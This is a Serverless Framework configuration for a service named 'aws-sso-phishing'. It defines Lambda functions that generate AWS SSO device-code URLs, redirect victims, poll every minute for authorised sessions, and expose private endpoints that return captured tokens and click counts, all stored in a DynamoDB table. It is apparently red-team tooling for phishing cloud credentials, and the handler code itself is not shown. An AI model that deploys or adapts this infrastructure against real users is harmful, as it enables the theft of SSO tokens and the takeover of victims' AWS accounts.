service: aws-sso-phishing
app: aws-sso-phishing


frameworkVersion: '2'

provider:
  name: aws
  runtime: python3.8
  stage: v1
  lambdaHashingVersion: 20201221
  apiGateway:
    apiKeys:
      - apiKey

  iam:
    role:
      statements:
        - Effect: "Allow"
          Action:
            - "dynamodb:PutItem"
            - "dynamodb:GetItem"
            - "dynamodb:Scan"
          Resource:
            Fn::GetAtt:
              - usersTable
              - Arn
custom: 
  ssoRegion: ${file(./config.js):ssoRegion}
  ssoUrl: ${file(./config.js):ssoUrl}
                              

package:
  individually: true

plugins:
  - serverless-plugin-scripts

functions:

  poller:
    handler: functions/poller/handler.main
    environment:
      REGION: ${self:custom.ssoRegion}
    package:
      exclude:
        - ./**
      include:
        - functions/poller/handler.py
    events:
          - schedule:
              rate: rate(1 minute)
              enabled: true

  urlRedirect:
    handler: functions/urlRedirect/handler.main
    environment:
      START_URL: ${self:custom.ssoUrl}
      REGION: ${self:custom.ssoRegion}
    package:
      exclude:
        - ./**
      include:
        - functions/urlRedirect/handler.py
    events:
      - http: get /


  getTokens:
    handler: functions/getTokens/handler.main
    package:
      exclude:
        - ./**
      include:
        - functions/getTokens/handler.py
    events:
      - http:
          path: getTokens
          method: get
          private: true

  getClicks:
    handler: functions/getClicks/handler.main
    package:
      exclude:
        - ./**
      include:
        - functions/getClicks/handler.py
    events:
      - http:
          path: getClicks
          method: get
          private: true


  createDeviceUrl:
    handler: functions/createDeviceUrl/handler.main
    environment:
      START_URL: "https://ruse.awsapps.com/start"
      REGION: ${self:custom.ssoRegion}
    package:
      exclude:
        - ./**
      include:
        - functions/createDeviceUrl/handler.py
    events:
      - http:
          path: createDeviceUrl
          method: get
          private: true


resources: # CloudFormation template syntax from here on.
  Resources:

    # Create DynamoDB
    usersTable:
      Type: AWS::DynamoDB::Table
      Properties:
        TableName: sessionTable
        AttributeDefinitions:
          - AttributeName: deviceCode
            AttributeType: S
        KeySchema:
          - AttributeName: deviceCode
            KeyType: HASH
        ProvisionedThroughput:
          ReadCapacityUnits: 1
          WriteCapacityUnits: 1



